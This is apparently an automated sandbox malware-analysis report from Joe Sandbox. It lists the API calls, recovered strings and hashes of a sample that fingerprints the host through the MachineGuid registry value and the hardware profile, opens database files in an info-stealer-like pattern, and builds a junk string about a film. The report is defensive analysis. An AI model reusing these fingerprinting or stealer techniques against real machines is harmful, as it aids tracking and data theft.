61e1a7b6 free realloc malloc 74393->74425 74396 61e75a7e 74396->74395 74397 61e75aa9 74396->74397 74427 61e22399 free realloc malloc 74396->74427 74428 61e222b9 free realloc malloc 74397->74428 74400 61e75ae1 74429 61e22355 free realloc malloc 74400->74429 74402 61e75afa 74430 61e222b9 free realloc malloc 74402->74430 74404 61e75b26 74431 61e222b9 free realloc malloc 74404->74431 74406 61e75b44 74408 61e75b56 74406->74408 74432 61e222b9 free realloc malloc 74406->74432 74433 61e22a48 free realloc malloc 74408->74433 74410 61e75b96 74434 61e23816 free realloc malloc 74410->74434 74412 61e75bb6 74435 61e223b7 free realloc malloc 74412->74435 74414 61e75bda 74436 61e223f2 free realloc malloc 74414->74436 74416 61e75c2a 74437 61e222b9 free realloc malloc 74416->74437 74418 61e75c45 74438 61e22399 free realloc malloc 74418->74438 74420->74395 74421->74378 74422->74381 74423->74382 74424->74395 74425->74395 74426->74396 74427->74397 74428->74400 74429->74402 74430->74404 74431->74406 74432->74408 74433->74410 74434->74412 74435->74414 74436->74416 74437->74418 74438->74395 74439 61e1d21e 74441 61e1d184 74439->74441 74440 61e1d1f9 74448 61e13ed7 74440->74448 74441->74440 74443 61e1d1b7 74441->74443 74447 61e1d19b 74441->74447 74445 61e1a8d8 3 API calls 74443->74445 74444 61e1d201 74444->74447 74455 61e1a839 free realloc malloc 74444->74455 74445->74447 74449 61e13ee8 74448->74449 74450 61e13efe 74449->74450 74453 61e13f0b 74449->74453 74451 61e0ae03 free 74450->74451 74452 61e13f06 74451->74452 74452->74444 74453->74452 74456 61e2a652 realloc 74453->74456 74455->74447 74457 61e2a683 74456->74457 74458 61e2a676 74456->74458 74460 61e2a4ce free realloc malloc 74457->74460 74458->74452 74460->74458
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 1475443563-0
                                                                                                • Opcode ID: a8ff26a4ae31eb3c0b072aa693abe32b47297d605d85dc291845808d49d3b3ac
                                                                                                • Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
                                                                                                • Opcode Fuzzy Hash: a8ff26a4ae31eb3c0b072aa693abe32b47297d605d85dc291845808d49d3b3ac
                                                                                                • Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00001770), ref: 0040105D
                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00401064
                                                                                                • lstrcatW.KERNEL32(00000000,Stiletto), ref: 00401079
                                                                                                • lstrcatW.KERNEL32(?,00439390), ref: 00401083
                                                                                                • lstrcatW.KERNEL32(?,0043938C), ref: 0040108D
                                                                                                • lstrcatW.KERNEL32(?,2008), ref: 00401097
                                                                                                • lstrcatW.KERNEL32(?,American), ref: 004010A1
                                                                                                • lstrcatW.KERNEL32(?,direct), ref: 004010AB
                                                                                                • lstrcatW.KERNEL32(?,00439354), ref: 004010B5
                                                                                                • lstrcatW.KERNEL32(?,video), ref: 004010BF
                                                                                                • lstrcatW.KERNEL32(?,action), ref: 004010C9
                                                                                                • lstrcatW.KERNEL32(?,film), ref: 004010D3
                                                                                                • lstrcatW.KERNEL32(?,directed), ref: 004010DD
                                                                                                • lstrcatW.KERNEL32(?,00439310), ref: 004010E7
                                                                                                • lstrcatW.KERNEL32(?,Nick), ref: 004010F1
                                                                                                • lstrcatW.KERNEL32(?,Vallelonga), ref: 004010FC
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 00401107
                                                                                                • lstrcatW.KERNEL32(?,produced), ref: 00401111
                                                                                                • lstrcatW.KERNEL32(?,00439310), ref: 0040111B
                                                                                                • lstrcatW.KERNEL32(?,Nick), ref: 00401125
                                                                                                • lstrcatW.KERNEL32(?,Vallelonga), ref: 0040112B
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 00401131
                                                                                                • lstrcatW.KERNEL32(?,Warren), ref: 0040113B
                                                                                                • lstrcatW.KERNEL32(?,Ostergard), ref: 00401145
                                                                                                • lstrcatW.KERNEL32(?,004392A4), ref: 0040114F
                                                                                                • lstrcatW.KERNEL32(?,stars), ref: 00401159
                                                                                                • lstrcatW.KERNEL32(?,Tom), ref: 00401164
                                                                                                • lstrcatW.KERNEL32(?,Berenger), ref: 0040116E
                                                                                                • lstrcatW.KERNEL32(?,Michael), ref: 00401178
                                                                                                • lstrcatW.KERNEL32(?,Biehn), ref: 00401182
                                                                                                • lstrcatW.KERNEL32(?,Stana), ref: 0040118C
                                                                                                • lstrcatW.KERNEL32(?,Katic), ref: 00401196
                                                                                                • lstrcatW.KERNEL32(?,William), ref: 004011A0
                                                                                                • lstrcatW.KERNEL32(?,Forsythe), ref: 004011AA
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 004011B0
                                                                                                • lstrcatW.KERNEL32(?,Tom), ref: 004011B6
                                                                                                • lstrcatW.KERNEL32(?,Sizemore), ref: 004011C0
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011CB
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011D0
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011D5
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011DA
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011DF
                                                                                                • lstrlenW.KERNEL32(?), ref: 004011E4
                                                                                                • _memset.LIBCMT ref: 004011EE
                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 004011FD
                                                                                                • lstrcatW.KERNEL32(?,Stiletto), ref: 0040120E
                                                                                                • lstrcatW.KERNEL32(?,00439390), ref: 00401218
                                                                                                • lstrcatW.KERNEL32(?,0043938C), ref: 00401222
                                                                                                • lstrcatW.KERNEL32(?,2008), ref: 0040122C
                                                                                                • lstrcatW.KERNEL32(?,American), ref: 00401236
                                                                                                • lstrcatW.KERNEL32(?,direct), ref: 00401240
                                                                                                • lstrcatW.KERNEL32(?,00439354), ref: 0040124A
                                                                                                • lstrcatW.KERNEL32(?,video), ref: 00401254
                                                                                                • lstrcatW.KERNEL32(?,action), ref: 0040125E
                                                                                                • lstrcatW.KERNEL32(?,film), ref: 00401268
                                                                                                • lstrcatW.KERNEL32(?,directed), ref: 00401272
                                                                                                • lstrcatW.KERNEL32(?,00439310), ref: 0040127C
                                                                                                • lstrcatW.KERNEL32(?,Nick), ref: 00401286
                                                                                                • lstrcatW.KERNEL32(?,Vallelonga), ref: 00401290
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 00401296
                                                                                                • lstrcatW.KERNEL32(?,produced), ref: 004012A0
                                                                                                • lstrcatW.KERNEL32(?,00439310), ref: 004012AA
                                                                                                • lstrcatW.KERNEL32(?,Nick), ref: 004012B4
                                                                                                • lstrcatW.KERNEL32(?,Vallelonga), ref: 004012BE
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 004012C4
                                                                                                • lstrcatW.KERNEL32(?,Warren), ref: 004012CE
                                                                                                • lstrcatW.KERNEL32(?,Ostergard), ref: 004012D8
                                                                                                • lstrcatW.KERNEL32(?,004392A4), ref: 004012E2
                                                                                                • lstrcatW.KERNEL32(?,stars), ref: 004012EC
                                                                                                • lstrcatW.KERNEL32(?,Tom), ref: 004012F6
                                                                                                • lstrcatW.KERNEL32(?,Berenger), ref: 00401300
                                                                                                • lstrcatW.KERNEL32(?,Michael), ref: 0040130A
                                                                                                • lstrcatW.KERNEL32(?,Biehn), ref: 00401314
                                                                                                • lstrcatW.KERNEL32(?,Stana), ref: 0040131E
                                                                                                • lstrcatW.KERNEL32(?,Katic), ref: 00401328
                                                                                                • lstrcatW.KERNEL32(?,William), ref: 00401332
                                                                                                • lstrcatW.KERNEL32(?,Forsythe), ref: 0040133C
                                                                                                • lstrcatW.KERNEL32(?,and), ref: 00401342
                                                                                                • lstrcatW.KERNEL32(?,Tom), ref: 0040134C
                                                                                                • lstrcatW.KERNEL32(?,Sizemore), ref: 00401356
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040135B
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401360
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401365
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040136A
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040136F
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401374
                                                                                                • _memset.LIBCMT ref: 0040137F
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401394
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401399
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040139E
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013A3
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013B5
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013BA
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013BF
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013C4
                                                                                                • _strlen.LIBCMT ref: 004013C9
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013EB
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013F0
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013F5
                                                                                                • lstrlenW.KERNEL32(?), ref: 004013FA
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401405
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040140A
                                                                                                • lstrlenW.KERNEL32(?), ref: 0040140F
                                                                                                • lstrlenW.KERNEL32(?), ref: 00401414
                                                                                                • _memset.LIBCMT ref: 0040141E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$lstrlen$_memset$Heap$AllocAllocateLocalProcess_strlen
                                                                                                • String ID: 2008$American$Berenger$Biehn$Forsythe$Katic$Michael$Nick$Ostergard$Sizemore$Stana$Stiletto$Tom$Vallelonga$Warren$William$action$and$direct$directed$film$produced$stars$video
                                                                                                • API String ID: 1440388185-1919393085
                                                                                                • Opcode ID: 113251238fef3f83970f6924f453b20cb6520b497cc1392a2e42dd0c411ddb66
                                                                                                • Instruction ID: 977ff658fd9bf0c87a79d801542fd28d69e8797ade22b74be8fc9e572a10d5fa
                                                                                                • Opcode Fuzzy Hash: 113251238fef3f83970f6924f453b20cb6520b497cc1392a2e42dd0c411ddb66
                                                                                                • Instruction Fuzzy Hash: B3B12C70D4055CFACF11ABA2CE4AE8FBE75EF48754F2114A2B504611B18BB65F20FE58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0041A0D3
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0041A0F2
                                                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041A117
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0041A123
                                                                                                • CharToOemA.USER32(?,?), ref: 0041A137
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                • API String ID: 2235053359-1211650757
                                                                                                • Opcode ID: e8916606853f80183d4e4cac180bd5b07d2806068a04618f474400d0608ba2a1
                                                                                                • Instruction ID: 2f48f5834e2454bc24746ae46a99f57378d54fc204fa25418032dda9b16ec4f5
                                                                                                • Opcode Fuzzy Hash: e8916606853f80183d4e4cac180bd5b07d2806068a04618f474400d0608ba2a1
                                                                                                • Instruction Fuzzy Hash: 1E1182B590032CAFDB10DF60DC89EEAB7BCEB04348F1041B6B615E2152D7749E888F94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00416020
                                                                                                • _memcmp.LIBCMT ref: 0041604D
                                                                                                • _memset.LIBCMT ref: 00416076
                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,000003E8,?,?,?,?,?,0000008C,000000FF,00000000), ref: 004160B1
                                                                                                  • Part of subcall function 00405421: _memmove.LIBCMT ref: 00405445
                                                                                                  • Part of subcall function 00404E94: _memmove.LIBCMT ref: 00404EB4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove$AllocH_prolog3_Local_memcmp_memset
                                                                                                • String ID: NULL$v10
                                                                                                • API String ID: 2751976447-1391045996
                                                                                                • Opcode ID: 9e3a0b8306df1a542b035b3b1626d2d2149344276e7aa24a958d8489b464d727
                                                                                                • Instruction ID: f4d55729467cdbdb5257fc1db8c5069637448291e69c50e1de44170b757c4793
                                                                                                • Opcode Fuzzy Hash: 9e3a0b8306df1a542b035b3b1626d2d2149344276e7aa24a958d8489b464d727
                                                                                                • Instruction Fuzzy Hash: 02310AB1D01219ABDB10DFA9D981AEEBBB9FF08314F64002EF905A7281D7799944CF58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcmp
                                                                                                • String ID: 0
                                                                                                • API String ID: 1475443563-4108050209
                                                                                                • Opcode ID: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
                                                                                                • Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
                                                                                                • Opcode Fuzzy Hash: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
                                                                                                • Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcmp$free
                                                                                                • String ID: @$rnal
                                                                                                • API String ID: 3401341699-826727331
                                                                                                • Opcode ID: 5a4379d4cfcf7d0586910c9dd162a297998cc0b494d94bc9188d3a75191f83d4
                                                                                                • Instruction ID: 0ce42be2a52064457b78e7c31244c3f07411abd0ae8e299ce13c5538bbb98839
                                                                                                • Opcode Fuzzy Hash: 5a4379d4cfcf7d0586910c9dd162a297998cc0b494d94bc9188d3a75191f83d4
                                                                                                • Instruction Fuzzy Hash: 70822470A04259CFEB60CF68C880B89BBF1BF45308F2481EAD8589B352E775D9A5CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID: winOpen
                                                                                                • API String ID: 823142352-2556188131
                                                                                                • Opcode ID: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
                                                                                                • Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
                                                                                                • Opcode Fuzzy Hash: 05e922388839dc4f4ca0a419fa8aad4fac10a301f76b51f4e0cfaabc36faa4c0
                                                                                                • Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID: winRead
                                                                                                • API String ID: 2738559852-2759563040
                                                                                                • Opcode ID: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                • Instruction ID: 0463a8294cdaeeb391ba6f45b5ad466d8cdf6662135ec028d0205bc88dba3c8e
                                                                                                • Opcode Fuzzy Hash: 851fea00ae6f1ba7616ac175e32ee1177d3feb74bace6ba213d978081e29e1e5
                                                                                                • Instruction Fuzzy Hash: 2041E475A052699BCF04CFA8D88498EBBF2FF88314F618529E868A7354D730E941CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041A069
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProfile
                                                                                                • String ID: Unknown
                                                                                                • API String ID: 2104809126-1654365787
                                                                                                • Opcode ID: 91ff28df61aea0c9bc6746e415b7bab10b144e6e939911b80896583abb12f046
                                                                                                • Instruction ID: 1ee76d63224a9dd6e6d9f6b0b3bb8525638a5972ea7dea0bfefb8eb3b52febb6
                                                                                                • Opcode Fuzzy Hash: 91ff28df61aea0c9bc6746e415b7bab10b144e6e939911b80896583abb12f046
                                                                                                • Instruction Fuzzy Hash: 16F0A731A0111DD7CB10DFA5CC05BDE77B8BB09348F10402AA941E3280DB78E904CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: realloc
                                                                                                • String ID:
                                                                                                • API String ID: 471065373-0
                                                                                                • Opcode ID: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                • Instruction ID: 4040ac9b910eb7d7724dfc403353a0a40a3fe088e4c24dccbd46c39564703f2d
                                                                                                • Opcode Fuzzy Hash: e26b6afafbe88dd408296985b2cf5437b863de116ceff75567ad09f3e2b45908
                                                                                                • Instruction Fuzzy Hash: C3F0F97180530A9FDB109F55C58195DFBE8EF84268F14C86DE8984B310D374E544CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RtlEncodePointer.NTDLL(00000000,00431FC3,0045C730,00000314,00000000,?,?,?,?,?,0042A052,0045C730,Microsoft Visual C++ Runtime Library,00012010), ref: 0042B0C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID:
                                                                                                • API String ID: 2118026453-0
                                                                                                • Opcode ID: 267bccce97fb01b67052af936aa1ccedfcd33808fb09cd48dbd23cffd6ad54e1
                                                                                                • Instruction ID: 38b7c258edfd2edc927cf7725bc0d3b843642b96c42c3ebaacbadf1941e180c6
                                                                                                • Opcode Fuzzy Hash: 267bccce97fb01b67052af936aa1ccedfcd33808fb09cd48dbd23cffd6ad54e1
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
